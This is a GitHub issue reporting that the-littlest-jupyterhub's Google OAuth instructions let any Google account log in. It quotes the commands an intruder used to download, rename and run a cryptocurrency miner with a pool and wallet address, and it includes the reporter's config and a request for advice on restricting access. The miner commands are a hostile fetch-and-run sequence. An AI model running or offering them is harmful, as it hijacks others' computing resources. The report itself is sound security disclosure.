### ISSUE TITLE
The official instructions for Google Auth leave a TLJH installation vulnerable

### ISSUE THREAD

**Issue by Bougakov** [jupyterhub/the-littlest-jupyterhub#884]
### Bug description

I have installed TLJH using the provided manual and enabled Google Auth. Recently, I've discovered that this auth method allows ANYONE with a Google account to access my installation. I found someone with an address `babymarinsz@gmail.com`  has managed to access it and install a cryptocurrency miner by running these commands in the terminal:

```
cat .bash_history 
lscpu
wget https://github.com/nanopool/nanominer/releases/download/v3.7.1/nanominer-linux-3.7.1.tar.gz && tar xvf nanominer-linux-3.7.1.tar.gz && chmod +x nanominer && mv nanominer dontkillme
./dontkillme -algo verushash -pool1 verushash.mine.zergpool.com:3300 -wallet TQ11YB4cti4EhwYkZkoYNwE9B7nkQvTJ86.$(echo $(shuf -i 1-999 -n 1)-TRXKU32CORE) -password c=TRX
```

#### Expected behaviour

The manual should be written in a way that the user by default ends up with only allowing a specific set of Google Accounts (john@gmail.com, jane@gmail.com) or Google Apps Domains (@example.com) whitelisted. There must be an explicit action taken by the user to extend the auth permissions to anyone with a Google Account.

### Your personal set up

I am using the-littlest-jupyterhub.

```
tljh-config show
users:
  admin:
  - a@example.com
  - g@example.com
http:
  port: 8888
user_environment:
  default_app: jupyterlab
https:
  port: 8888
auth:
  GoogleOAuthenticator:
    client_id: censored.apps.googleusercontent.com
    client_secret: censored
    oauth_callback_url: https://python.example.com/hub/oauth_callback
  type: oauthenticator.google.GoogleOAuthenticator
```

I am using Ubuntu on a Digital Ocean droplet.

I am looking for advice on how to restrict access to only Google Workspace accounts from a list of particular domains. Thank you.
